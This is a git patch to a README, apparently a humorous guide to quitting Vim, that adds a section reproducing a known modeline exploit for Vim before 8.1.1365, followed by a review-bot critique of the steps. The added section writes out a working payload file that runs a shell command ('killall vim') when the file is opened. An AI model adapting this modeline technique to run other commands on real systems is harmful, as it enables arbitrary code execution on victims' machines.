From b0ae82d18f3f19c5364e80bfbbefc847033efa46 Mon Sep 17 00:00:00 2001 From: "Hikaru Terazono (3c1u)" <3c1u@vulpesgames.tokyo> Date: Tue, 14 Jan 2020 08:18:13 +0900 Subject: [PATCH] Add The Arbitrary Code Execution Way --- README.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/README.md b/README.md index d2dfe82..7676874 100644 --- a/README.md +++ b/README.md @@ -639,3 +639,20 @@ ssh -i ec2-user@ vim ``` 5. In the AWS EC2, select the newly created EC2 instance and terminate the instance. + +## The Arbitrary Code Execution Way + +Based on https://www.exploit-db.com/exploits/46973. Works with Vim < 8.1.1365. + +1. Create a file (say `quit.txt`) with the following data: +``` +echo ':!killall vim||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="' > quit.txt +``` +2. Ensure that the modeline option has not been disabled. +``` +echo "set modeline" >> .vimrc +``` +3. Open `quit.txt`. +``` +:e! quit.txt +```
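Review bot: Step 2's command does not match its description and targets the wrong file: `echo "set modeline" >> .vimrc` appends to a `.vimrc` in the current working directory, which Vim never reads, so it should be `>> ~/.vimrc` (or, since the step only asks the reader to make sure the option is on, `:set modeline?` from inside Vim is the actual check). A sentence on why this matters would help too: the payload in `quit.txt` is an ordinary modeline (`vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="`), so with `modeline` off step 3 just opens a harmless text file, and the version bound "Vim < 8.1.1365" alone is not a sufficient precondition. Two smaller points: `killall vim` terminates every Vim process on the host, not only the one that opened `quit.txt`, which deserves a warning given the rest of the README, and steps 1 and 2 are shell commands while step 3 is an Ex command, so either state that the first two are done before starting Vim or write them as `:!echo ...` so the whole recipe can be followed from inside the editor.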